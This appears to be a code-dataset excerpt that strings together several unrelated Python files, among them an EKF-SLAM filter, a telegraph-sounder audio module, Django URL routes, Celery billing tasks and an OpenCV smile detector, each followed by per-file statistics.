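    assert np.allclose(Gz @ R2 @ Gz.T, cov_mc, atol=1e-3)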
def associate(
self, z: np.ndarray, zpred: np.ndarray, H: np.ndarray, S: np.ndarray,
): # -> Tuple[*((np.ndarray,) * 5)]:
"""Associate landmarks and measurements, and extract correct matrices for these.
Parameters
----------
z : np.ndarray,
The measurements all in one vector
zpred : np.ndarray
Predicted measurements in one vector
H : np.ndarray
The measurement Jacobian matrix related to zpred
S : np.ndarray
The innovation covariance related to zpred
Returns
-------
Tuple[*((np.ndarray,) * 5)]
The extracted measurements, the corresponding zpred, H, S and the associations.
Note
----
The associations are calculated using JCBB; see that function for documentation
of the returned association and the association procedure.
"""
if self.do_asso:
# Associate
a = JCBB(z, zpred, S, self.alphas[0], self.alphas[1])
# Extract associated measurements
zinds = np.empty_like(z, dtype=bool)
zinds[::2] = a > -1 # -1 means no association
zinds[1::2] = zinds[::2]
zass = z[zinds]
# extract and rearange predicted measurements and cov
zbarinds = np.empty_like(zass, dtype=int)
zbarinds[::2] = 2 * a[a > -1]
zbarinds[1::2] = 2 * a[a > -1] + 1
zpredass = zpred[zbarinds]
Sass = S[zbarinds][:, zbarinds]
Hass = H[zbarinds]
assert zpredass.shape == zass.shape
assert Sass.shape == zpredass.shape * 2
assert Hass.shape[0] == zpredass.shape[0]
return zass, zpredass, Hass, Sass, a
else:
# should one do something here?
pass
def update(
self, eta: np.ndarray, P: np.ndarray, z: np.ndarray
) -> Tuple[np.ndarray, np.ndarray, float, np.ndarray]:
"""Update eta and P with z, associating landmarks and adding new ones.
Parameters
----------
eta : np.ndarray
the robot state and map concatenated
P : np.ndarray
the covariance of eta
z : np.ndarray, shape=(#detections, 2)
detected ranges and bearings, one detection per row
Returns
-------
Tuple[np.ndarray, np.ndarray, float, np.ndarray]
updated eta, updated P, the NIS, and the measurement-to-landmark associations
"""
# etaupd, Pupd, NIS, a = solution.EKFSLAM.EKFSLAM.update(self, eta, P, z)
#return etaupd, Pupd, NIS, a
numLmk = (eta.size - 3) // 2
assert (len(eta) - 3) % 2 == 0, "EKFSLAM.update: landmark length not even"
if numLmk > 0:
# Prediction and innovation covariance
zpred = self.h(eta)
H = self.h_jac(eta)
# Here you can use simply np.kron (a bit slow) to form the big (very big in VP after a while) R,
# or be smart with indexing and broadcasting (3d indexing into 2d mat) realizing you are adding the same R on all diagonals
S = H@P@H.T + np.kron(np.eye(numLmk), self.R)
assert (
S.shape == zpred.shape * 2
), "EKFSLAM.update: wrong shape on either S or zpred"
z = z.ravel() # 2D -> flat
# Perform data association
za, zpred, Ha, Sa, a = self.associate(z, zpred, H, S)
# No association could be made, so skip update
if za.shape[0] == 0:
etaupd = eta
Pupd = P
NIS = 1 # TODO: beware this one when analysing consistency.
else:
# Create the associated innovation
v = za.ravel() - zpred # za: 2D -> flat
v[1::2] = utils.wrapToPi(v[1::2])
# Kalman mean update
S_cho_factors = la.cho_factor(Sa) # Optional, used in places for S^-1, see scipy.linalg.cho_factor and scipy.linalg.cho_solve
Sa_inv = la.cho_solve(S_cho_factors, np.eye(Sa.shape[0]))
W = P@Ha.T@Sa_inv
etaupd = eta + W@v
# Kalman cov update: use Joseph form for stability
jo = -W @ Ha
# same as adding Identity mat
jo[np.diag_indices(jo.shape[0])] += 1
Pupd = jo@P@jo.T + W@np.kron(np.eye(int(len(zpred)/2)), self.R)@W.T
# calculate NIS, can use S_cho_factors
NIS = v.T@Sa_inv@v
# When tested, remove for speed
assert np.allclose(
Pupd, Pupd.T), "EKFSLAM.update: Pupd not symmetric"
assert np.all(
np.linalg.eigvals(Pupd) > 0
), "EKFSLAM.update: Pupd not positive definite"
else: # All measurements are new landmarks
a = np.full(z.shape[0], -1)
z = z.flatten()
NIS = 1 # TODO: beware this one when analysing consistency.
etaupd = eta
Pupd = P
# Create new landmarks if any is available
if self.do_asso:
is_new_lmk = a == -1
if np.any(is_new_lmk):
z_new_inds = np.empty_like(z, dtype=bool)
z_new_inds[::2] = is_new_lmk
z_new_inds[1::2] = is_new_lmk
z_new = z[z_new_inds]
etaupd, Pupd = self.add_landmarks(etaupd, Pupd, z_new)
assert np.allclose(
Pupd, Pupd.T), "EKFSLAM.update: Pupd must be symmetric"
assert np.all(np.linalg.eigvals(Pupd) >=
0), "EKFSLAM.update: Pupd must be PSD"
return etaupd, Pupd, NIS, a
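# --- Illustrative aside (not part of the original file): the two ways of building
# the stacked measurement noise mentioned in update(): np.kron (simple) versus
# writing the same 2x2 block onto every diagonal block via fancy indexing, which
# scales better for many landmarks. Dummy values below.
def _demo_stacked_R(numLmk=4):
    R2 = np.diag([0.1, 0.01])             # stand-in for self.R
    big_R_kron = np.kron(np.eye(numLmk), R2)
    big_R_idx = np.zeros((2 * numLmk, 2 * numLmk))
    base = 2 * np.arange(numLmk)
    for di in range(2):
        for dj in range(2):
            big_R_idx[base + di, base + dj] = R2[di, dj]
    assert np.allclose(big_R_kron, big_R_idx)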
@classmethod
def NEESes(cls, x: np.ndarray, P: np.ndarray, x_gt: np.ndarray,) -> np.ndarray:
"""Calculates the total NEES and the NEES for the substates
Args:
x (np.ndarray): The estimate
P (np.ndarray): The state covariance
x_gt (np.ndarray): The ground truth
Raises:
AssertionError: if any input has the wrong shape, or, when debug mode is on, if certain numeric properties are violated
Returns:
np.ndarray: NEES for [all, position, heading], shape (3,)
"""
assert x.shape == (3,), f"EKFSLAM.NEES: x shape incorrect {x.shape}"
assert P.shape == (3, 3), f"EKFSLAM.NEES: P shape incorrect {P.shape}"
assert x_gt.shape == (
3,), f"EKFSLAM.NEES: x_gt shape incorrect {x_gt.shape}"
d_x = x - x_gt
d_x[2] = utils.wrapToPi(d_x[2])
assert (
-np.pi <= d_x[2] <= np.pi
), "EKFSLAM.NEES: error heading must be between (-pi, pi)"
d_p = d_x[0:2]
P_p = P[0:2, 0:2]
assert d_p.shape == (2,), "EKFSLAM.NEES: d_p must be 2 long"
d_heading = d_x[2] # Note: scalar
assert np.ndim(
d_heading) == 0, "EKFSLAM.NEES: d_heading must be scalar"
P_heading = P[2, 2] # Note: scalar
assert np.ndim(
P_heading) == 0, "EKFSLAM.NEES: P_heading must be scalar"
# NB: Needs to handle both vectors and scalars! Additionally, must handle division by zero
NEES_all = d_x @ (np.linalg.solve(P, d_x))
NEES_pos = d_p @ (np.linalg.solve(P_p, d_p))
try:
NEES_heading = d_heading ** 2 / P_heading
except ZeroDivisionError:
NEES_heading = 1.0 # TODO: beware
NEESes = np.array([NEES_all, NEES_pos, NEES_heading])
NEESes[np.isnan(NEESes)] = 1.0 # We may divide by zero, # TODO: beware
assert np.all(NEESes >= 0), "ESKF.NEES: one or more negative NEESes"
return NEESes
| 35.77757
| 141
| 0.539575
| 2,612
| 19,141
| 3.898162
| 0.174962
| 0.067177
| 0.02475
| 0.020625
| 0.281281
| 0.236005
| 0.209586
| 0.199371
| 0.181006
| 0.152622
| 0
| 0.023466
| 0.340996
| 19,141
| 534
| 142
| 35.844569
| 0.783732
| 0.373021
| 0
| 0.171429
| 0
| 0
| 0.100321
| 0.006052
| 0
| 0
| 0
| 0.003745
| 0.118367
| 1
| 0.040816
| false
| 0.004082
| 0.040816
| 0
| 0.146939
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5a924ddb3332cd660e8de578d9b220740f27184
| 3,185
|
py
|
Python
|
pykob/audio.py
|
Greg-R/PyKOB
|
fd3c7ca352f900bd14bb10dc71d567221a8af8cf
|
[
"MIT"
] | 3
|
2020-06-29T19:59:39.000Z
|
2021-02-08T19:56:32.000Z
|
pykob/audio.py
|
Greg-R/PyKOB
|
fd3c7ca352f900bd14bb10dc71d567221a8af8cf
|
[
"MIT"
] | 197
|
2020-04-30T08:08:52.000Z
|
2021-03-22T19:10:20.000Z
|
pykob/audio.py
|
MorseKOB/pykob-4
|
bf86917e4e06ce9590f414ace0eacbde08416137
|
[
"MIT"
] | 2
|
2021-04-17T01:05:24.000Z
|
2021-11-03T16:43:53.000Z
|
"""
MIT License
Copyright (c) 2020 PyKOB - MorseKOB in Python
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
"""
audio module
Provides audio for simulated sounder.
"""
import wave
from pathlib import Path
from pykob import log
try:
import pyaudio
ok = True
except Exception:
log.log('PyAudio not installed.')
ok = False
BUFFERSIZE = 16
nFrames = [0, 0]
frames = [None, None]
nullFrames = None
iFrame = [0, 0]
sound = 0
if ok:
pa = pyaudio.PyAudio()
# Resource folder
root_folder = Path(__file__).parent
resource_folder = root_folder / "resources"
# Audio files
audio_files = ['clack48.wav', 'click48.wav']
for i in range(len(audio_files)):
fn = resource_folder / audio_files[i]
# print("Load audio file:", fn)
f = wave.open(str(fn), mode='rb')
nChannels = f.getnchannels()
sampleWidth = f.getsampwidth()
sampleFormat = pa.get_format_from_width(sampleWidth)
frameWidth = nChannels * sampleWidth
frameRate = f.getframerate()
nFrames[i] = f.getnframes()
frames[i] = f.readframes(nFrames[i])
iFrame[i] = nFrames[i]
f.close()
nullFrames = bytes(frameWidth*BUFFERSIZE)
def play(snd):
global sound
sound = snd
iFrame[sound] = 0
def callback(in_data, frame_count, time_info, status_flags):
if frame_count != BUFFERSIZE:
log.err('Unexpected frame count request from PyAudio:', frame_count)
if iFrame[sound] + frame_count < nFrames[sound]:
startByte = iFrame[sound] * frameWidth
endByte = (iFrame[sound] + frame_count) * frameWidth
outData = frames[sound][startByte:endByte]
iFrame[sound] += frame_count
return (outData, pyaudio.paContinue)
else:
return (nullFrames, pyaudio.paContinue)
if ok:
apiInfo = pa.get_default_host_api_info()
apiName = apiInfo['name']
devIdx = apiInfo['defaultOutputDevice']
devInfo = pa.get_device_info_by_index(devIdx)
devName = devInfo['name']
strm = pa.open(rate=frameRate, channels=nChannels, format=sampleFormat,
output=True, output_device_index=devIdx, frames_per_buffer=BUFFERSIZE,
stream_callback=callback)
| 32.5
| 82
| 0.706122
| 423
| 3,185
| 5.231678
| 0.477541
| 0.039765
| 0.02169
| 0.028468
| 0.025305
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006352
| 0.209105
| 3,185
| 97
| 83
| 32.835052
| 0.872172
| 0.358242
| 0
| 0.035088
| 0
| 0
| 0.063797
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035088
| false
| 0
| 0.070175
| 0
| 0.122807
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5ac9cd651f965f113812d5a35b9a777736d390b
| 3,492
|
py
|
Python
|
{{ cookiecutter.project_slug }}/{{ cookiecutter.package_name }}/strategies/resource.py
|
EMMC-ASBL/oteapi-plugin-template
|
31a772a4fb9be6eafabfa206fe6e7a23516bf188
|
[
"MIT"
] | null | null | null |
{{ cookiecutter.project_slug }}/{{ cookiecutter.package_name }}/strategies/resource.py
|
EMMC-ASBL/oteapi-plugin-template
|
31a772a4fb9be6eafabfa206fe6e7a23516bf188
|
[
"MIT"
] | 35
|
2022-01-17T10:23:01.000Z
|
2022-03-11T19:41:36.000Z
|
{{ cookiecutter.project_slug }}/{{ cookiecutter.package_name }}/strategies/resource.py
|
EMMC-ASBL/oteapi-plugin-template
|
31a772a4fb9be6eafabfa206fe6e7a23516bf188
|
[
"MIT"
] | 2
|
2022-01-20T06:45:27.000Z
|
2022-02-09T15:59:21.000Z
|
"""Demo resource strategy class."""
# pylint: disable=no-self-use,unused-argument
from typing import TYPE_CHECKING, Optional
from oteapi.models import AttrDict, DataCacheConfig, ResourceConfig, SessionUpdate
from oteapi.plugins import create_strategy
from pydantic import Field
from pydantic.dataclasses import dataclass
if TYPE_CHECKING: # pragma: no cover
from typing import Any, Dict
class DemoConfig(AttrDict):
"""Strategy-specific Configuration Data Model."""
datacache_config: Optional[DataCacheConfig] = Field(
None,
description="Configuration for the data cache.",
)
class DemoResourceConfig(ResourceConfig):
"""Demo resource strategy config."""
# Require the resource to be a REST API with JSON responses that uses the
# DemoJSONDataParseStrategy strategy.
mediaType: str = Field(
"application/jsonDEMO",
const=True,
description=ResourceConfig.__fields__["mediaType"].field_info.description,
)
accessService: str = Field(
"DEMO-access-service",
const=True,
description=ResourceConfig.__fields__["accessService"].field_info.description,
)
configuration: DemoConfig = Field(
DemoConfig(),
description="Demo resource strategy-specific configuration.",
)
class SessionUpdateDemoResource(SessionUpdate):
"""Class for returning values from Demo Resource strategy."""
output: dict = Field(
...,
description=(
"The output from downloading the response from the given `accessUrl`."
),
)
@dataclass
class DemoResourceStrategy:
"""Resource Strategy.
**Registers strategies**:
- `("accessService", "DEMO-access-service")`
"""
resource_config: DemoResourceConfig
def initialize(self, session: "Optional[Dict[str, Any]]" = None) -> SessionUpdate:
"""Initialize strategy.
This method will be called through the `/initialize` endpoint of the OTEAPI
Services.
Parameters:
session: A session-specific dictionary context.
Returns:
An update model of key/value-pairs to be stored in the
session-specific context from services.
"""
return SessionUpdate()
def get(
self, session: "Optional[Dict[str, Any]]" = None
) -> SessionUpdateDemoResource:
"""Execute the strategy.
This method will be called through the strategy-specific endpoint of the
OTEAPI Services.
Parameters:
session: A session-specific dictionary context.
Returns:
An update model of key/value-pairs to be stored in the
session-specific context from services.
"""
# Example of the plugin using a parse strategy to fetch and parse the data
session = session if session else {}
parse_config = self.resource_config.copy()
if not parse_config.downloadUrl:
parse_config.downloadUrl = self.resource_config.accessUrl
session.update(create_strategy("parse", parse_config).initialize(session))
session.update(create_strategy("parse", parse_config).get(session))
if "content" not in session:
raise ValueError(
f"Expected the parse strategy for {self.resource_config.mediaType!r} "
"to return a session with a 'content' key."
)
return SessionUpdateDemoResource(output=session["content"])
| 29.846154
| 86
| 0.665521
| 362
| 3,492
| 6.350829
| 0.337017
| 0.034798
| 0.034798
| 0.029578
| 0.275772
| 0.240974
| 0.240974
| 0.174859
| 0.140061
| 0.140061
| 0
| 0
| 0.248568
| 3,492
| 116
| 87
| 30.103448
| 0.876143
| 0.30756
| 0
| 0.037037
| 0
| 0
| 0.173835
| 0.015233
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037037
| false
| 0
| 0.111111
| 0
| 0.37037
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5b066bc7defe004716762bdcddd92dae0d3fd15
| 876
|
py
|
Python
|
BaseKnowledge/file/file.py
|
Kose-i/python_test
|
d7b031aa33d699aeb9fe196fe0a6d216aa006f0d
|
[
"Unlicense"
] | null | null | null |
BaseKnowledge/file/file.py
|
Kose-i/python_test
|
d7b031aa33d699aeb9fe196fe0a6d216aa006f0d
|
[
"Unlicense"
] | null | null | null |
BaseKnowledge/file/file.py
|
Kose-i/python_test
|
d7b031aa33d699aeb9fe196fe0a6d216aa006f0d
|
[
"Unlicense"
] | null | null | null |
#! /usr/bin/env python3
def func1():
f = open("test.txt", 'w')
f.write("This is test")
f.close()
def func2():
with open("test.txt", 'r') as f:
print(f.read())
import codecs
def func3():
f = codecs.open("test.txt", 'w', 'utf-8', 'ignore')
f.write("test func3")
f.close()
import os.path
def func4():
path = "tmp/tmp-1/tmp.txt"
print(os.path.split(path))
import shutil
def func5():
shutil.copyfile("test.txt", "test2.txt")
import glob
def func6():
print(glob.glob('*'))
import tempfile
def func7():
tmpfd, tmpname = tempfile.mkstemp(dir='.')
print(tmpname)
f = os.fdopen(tmpfd, 'w+b')
f.close()
if __name__ == '__main__':
print("\nfunc1()")
func1()
print("\nfunc2()")
func2()
print("\nfunc3()")
func3()
print("\nfunc4()")
func4()
print("\nfunc5()")
func5()
print("\nfunc6()")
func6()
print("\nfunc7()")
func7()
| 16.528302
| 53
| 0.592466
| 125
| 876
| 4.088
| 0.456
| 0.054795
| 0.064579
| 0.046967
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035961
| 0.174658
| 876
| 52
| 54
| 16.846154
| 0.670816
| 0.025114
| 0
| 0.069767
| 0
| 0
| 0.199297
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.162791
| false
| 0
| 0.116279
| 0
| 0.27907
| 0.255814
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5b4efb9c597491e24e7c42cb5dac380b74e6e91
| 702
|
py
|
Python
|
apps/billing/tasks.py
|
banyanbbt/banyan_data
|
4ce87dc1c49920d587a472b70842fcf5b3d9a3d2
|
[
"MIT"
] | 2
|
2018-09-08T05:16:39.000Z
|
2018-09-10T02:50:31.000Z
|
apps/billing/tasks.py
|
banyanbbt/banyan_data
|
4ce87dc1c49920d587a472b70842fcf5b3d9a3d2
|
[
"MIT"
] | null | null | null |
apps/billing/tasks.py
|
banyanbbt/banyan_data
|
4ce87dc1c49920d587a472b70842fcf5b3d9a3d2
|
[
"MIT"
] | null | null | null |
import logging
from config.celery_configs import app
from lib.sms import client as sms_client
from lib.blockchain.pandora import Pandora
from apps.user.models import UserProfile
logger = logging.getLogger(__name__)
@app.task
def sync_monthly_billing():
logger.info("start sync_monthly_billing")
accounts = UserProfile.company_accounts()
for account in accounts:
Pandora.monthly_bill(account)
logger.info("end sync_monthly_billing")
@app.task
def sync_weekly_billing():
logger.info("start sync_weekly_billing")
accounts = UserProfile.company_accounts()
for account in accounts:
Pandora.weekly_bill(account)
logger.info("end sync_weekly_billing")
| 23.4
| 45
| 0.763533
| 92
| 702
| 5.586957
| 0.380435
| 0.077821
| 0.105058
| 0.054475
| 0.474708
| 0.373541
| 0.264591
| 0.264591
| 0.264591
| 0.264591
| 0
| 0
| 0.156695
| 702
| 29
| 46
| 24.206897
| 0.868243
| 0
| 0
| 0.3
| 0
| 0
| 0.140401
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.25
| 0
| 0.35
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5b824b421e3455471988b500baaf9d0bcd0357a
| 4,981
|
py
|
Python
|
website/urls.py
|
pomo-mondreganto/CTForces-old
|
86758192f800108ff109f07fe155d5a98b4a3e14
|
[
"MIT"
] | null | null | null |
website/urls.py
|
pomo-mondreganto/CTForces-old
|
86758192f800108ff109f07fe155d5a98b4a3e14
|
[
"MIT"
] | 6
|
2021-10-01T14:18:34.000Z
|
2021-10-01T14:19:17.000Z
|
website/urls.py
|
pomo-mondreganto/CTForces-old
|
86758192f800108ff109f07fe155d5a98b4a3e14
|
[
"MIT"
] | null | null | null |
from django.conf import settings
from django.urls import path, re_path
from django.views.static import serve
from .views import *
urlpatterns = [
re_path('^$', MainView.as_view(), name='main_view'),
path('page/<int:page>/', MainView.as_view(), name='main_view_with_page'),
re_path('^signup/$', UserRegistrationView.as_view(), name='signup'),
re_path('^signin/$', UserLoginView.as_view(), name='signin'),
re_path('^logout/$', logout_user, name='logout'),
path('user/<str:username>/', UserInformationView.as_view(), name='user_info'),
re_path('^settings/general/$', SettingsGeneralView.as_view(), name='settings_general_view'),
re_path('^settings/social/$', SettingsSocialView.as_view(), name='settings_social_view'),
re_path('^friends/$', FriendsView.as_view(), name='friends_view'),
path('friends/page/<int:page>/', FriendsView.as_view(), name='friends_view_with_page'),
re_path('^search_users/$', search_users, name='user_search'),
path('user/<str:username>/blog/', UserBlogView.as_view(), name='user_blog_view'),
path('user/<str:username>/blog/page/<int:page>/', UserBlogView.as_view(), name='user_blog_view_with_page'),
path('user/<str:username>/tasks/', UserTasksView.as_view(), name='user_tasks_view'),
path('user/<str:username>/tasks/page/<int:page>/', UserTasksView.as_view(), name='user_tasks_view_with_page'),
path('user/<str:username>/contests/', UserContestListView.as_view(), name='user_contests_view'),
path('user/<str:username>/contests/page/<int:page>/', UserContestListView.as_view(),
name='user_contests_view_with_page'),
path('user/<str:username>/solved_tasks/', UserSolvedTasksView.as_view(),
name='user_solved_tasks_view'),
path('user/<str:username>/solved_tasks/page/<int:page>/', UserSolvedTasksView.as_view(),
name='user_solved_tasks_view_with_page'),
path('top_users/', UserTopView.as_view(), name='users_top_view'),
path('top_users/page/<int:page>/', UserTopView.as_view(), name='users_top_view_with_page'),
path('top_rating_users/', UserRatingTopView.as_view(), name='users_rating_top_view'),
path('top_rating_users/page/<int:page>/', UserRatingTopView.as_view(), name='users_rating_top_view_with_page'),
path('top_rating_users_by_group/', UserByGroupRatingTopView.as_view(), name='users_by_group_rating_top_view'),
path('top_rating_users_by_group/page/<int:page>/', UserByGroupRatingTopView.as_view(),
name='users_by_group_rating_top_view_with_page'),
re_path('^add_post/$', PostCreationView.as_view(), name='post_creation_view'),
path('post/<int:post_id>/', PostView.as_view(), name='post_view'),
re_path('^leave_comment/$', leave_comment, name='leave_comment'),
re_path('^media/(?P<path>.*)$', serve, {
'document_root': settings.MEDIA_ROOT,
}),
path('task/<int:task_id>/', TaskView.as_view(), name='task_view'),
path('task/<int:task_id>/edit/', TaskEditView.as_view(), name='task_edit_view'),
path('task/<int:task_id>/submit/', submit_task, name='task_submit'),
path('task/<int:task_id>/solved/', TaskSolvedView.as_view(), name='task_solved_view'),
path('task/<int:task_id>/solved/page/<int:page>/', TaskSolvedView.as_view(), name='task_solved_view_with_page'),
re_path('^create_task/$', TaskCreationView.as_view(), name='task_creation_view'),
re_path('^tasks/$', TasksArchiveView.as_view(), name='task_archive_view'),
path('tasks/page/<int:page>/', TasksArchiveView.as_view(), name='task_archive_view_with_page'),
re_path('^confirm_email/$', account_confirmation, name='confirm_account'),
re_path('^resend_email/$', EmailResendView.as_view(), name='resend_email_view'),
re_path('^password_reset_email/$', PasswordResetEmailView.as_view(), name='password_reset_email'),
re_path('^reset_password/$', PasswordResetPasswordView.as_view(), name='password_reset_password'),
re_path('^search_tags/$', search_tags, name='search_tags'),
re_path('^get_task/$', get_task, name='get_task_by_id'),
re_path('^create_contest/$', ContestCreationView.as_view(), name='create_contest'),
path('contests/', ContestsMainListView.as_view(), name='contests_main_list_view'),
path('contests/page/<int:page>/', ContestsMainListView.as_view(), name='contests_main_list_view_with_page'),
path('contest/<int:contest_id>/', ContestMainView.as_view(), name='contest_view'),
path('contest/<int:contest_id>/register/', register_for_contest, name='register_for_contest'),
path('contest/<int:contest_id>/scoreboard/', ContestScoreboardView.as_view(), name='contest_scoreboard_view'),
path('contest/<int:contest_id>/task/<int:task_id>/', ContestTaskView.as_view(), name='contest_task_view'),
path('contest/<int:contest_id>/task/<int:task_id>/submit/', submit_contest_flag, name='contest_task_submit'),
re_path('^test', test_view, name='test_view'),
re_path('^debug', debug_view, name='debug_view'),
]
| 54.736264
| 116
| 0.718932
| 666
| 4,981
| 5.018018
| 0.15015
| 0.102932
| 0.122681
| 0.051167
| 0.514961
| 0.429683
| 0.331239
| 0.162478
| 0.059246
| 0.059246
| 0
| 0
| 0.093957
| 4,981
| 90
| 117
| 55.344444
| 0.740527
| 0
| 0
| 0
| 0
| 0
| 0.429633
| 0.259787
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.030769
| 0.061538
| 0
| 0.061538
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5b8284d0679076f983319f40b4e3ceca65a28c5
| 1,372
|
py
|
Python
|
part2.py
|
Tiziana-I/project-covid-mask-classifier
|
e1619172656f8de92e8faae5dcb7437686f7ca5e
|
[
"MIT"
] | null | null | null |
part2.py
|
Tiziana-I/project-covid-mask-classifier
|
e1619172656f8de92e8faae5dcb7437686f7ca5e
|
[
"MIT"
] | null | null | null |
part2.py
|
Tiziana-I/project-covid-mask-classifier
|
e1619172656f8de92e8faae5dcb7437686f7ca5e
|
[
"MIT"
] | null | null | null |
import numpy as np
import cv2
import os
cap = cv2.VideoCapture(0)
#model=cv2.CascadeClassifier(os.path.join("haar-cascade-files","haarcascade_frontalface_default.xml"))
smile=cv2.CascadeClassifier(os.path.join("haar-cascade-files","haarcascade_smile.xml"))
#eye=cv2.CascadeClassifier(os.path.join("haar-cascade-files","haarcascade_eye.xml"))
while(True):
# Capture frame-by-frame
ret, frame = cap.read()
# Face detector
#cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),2)
#roi = frame[y:y+h,x:x+w]
#faces = model.detectMultiScale(frame,scaleFactor=1.5,minNeighbors=3,flags=cv2.CASCADE_DO_ROUGH_SEARCH | cv2.CASCADE_SCALE_IMAGE)
faces = smile.detectMultiScale(frame,scaleFactor=1.5,minNeighbors=3,flags=cv2.CASCADE_DO_ROUGH_SEARCH | cv2.CASCADE_SCALE_IMAGE)
#faces = eye.detectMultiScale(frame,scaleFactor=1.5,minNeighbors=3,flags=cv2.CASCADE_DO_ROUGH_SEARCH | cv2.CASCADE_SCALE_IMAGE)
print(faces)
for x,y,w,h in faces:
print(x,y,w,h)
cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),2) # blue BGR
frame = cv2.putText(frame,"Ciao", (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 0, 0) , 2, cv2.LINE_AA)
# Display the resulting frame
cv2.imshow('frame', frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# When everything done, release the capture
cap.release()
cv2.destroyAllWindows()
| 38.111111
| 133
| 0.707726
| 213
| 1,372
| 4.455399
| 0.375587
| 0.063224
| 0.069547
| 0.082192
| 0.55216
| 0.55216
| 0.55216
| 0.55216
| 0.55216
| 0.371971
| 0
| 0.045416
| 0.133382
| 1,372
| 36
| 134
| 38.111111
| 0.752733
| 0.456268
| 0
| 0
| 0
| 0
| 0.066576
| 0.028533
| 0
| 0
| 0.005435
| 0
| 0
| 1
| 0
| false
| 0
| 0.166667
| 0
| 0.166667
| 0.111111
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5b8565cb66fcfd69f346054d3bf2453f6824c71
| 1,371
|
py
|
Python
|
docs/commands.py
|
immersionroom/vee
|
2c6f781dc96e9028f2446777b906ca37dc2f4299
|
[
"BSD-3-Clause"
] | 6
|
2017-11-05T02:44:10.000Z
|
2021-07-14T19:10:56.000Z
|
docs/commands.py
|
immersionroom/vee
|
2c6f781dc96e9028f2446777b906ca37dc2f4299
|
[
"BSD-3-Clause"
] | null | null | null |
docs/commands.py
|
immersionroom/vee
|
2c6f781dc96e9028f2446777b906ca37dc2f4299
|
[
"BSD-3-Clause"
] | 1
|
2017-01-31T23:10:09.000Z
|
2017-01-31T23:10:09.000Z
|
import os
import sys
from argparse import _SubParsersAction
sys.path.append(os.path.abspath(os.path.join(__file__, '..', '..')))
from vee.commands.main import get_parser
def get_sub_action(parser):
for action in parser._actions:
if isinstance(action, _SubParsersAction):
return action
parser = get_parser()
usage = parser.format_usage().replace('usage:', '')
print('''
top-level
---------
.. _cli_vee:
``vee``
~~~~~~~
::
''')
for line in parser.format_help().splitlines():
print(' ' + line)
subaction = get_sub_action(parser)
for group_name, funcs in parser._func_groups:
did_header = False
visible = set(ca.dest for ca in subaction._choices_actions)
for name, func in funcs:
if name not in visible:
continue
if not did_header:
print('.. _cli_%s:' % group_name.replace(' ', '_'))
print()
print(group_name)
print('-' * len(group_name))
print()
did_header = True
subparser = subaction._name_parser_map[name]
print('.. _cli_vee_%s:' % name)
print()
print('``vee %s``' % name)
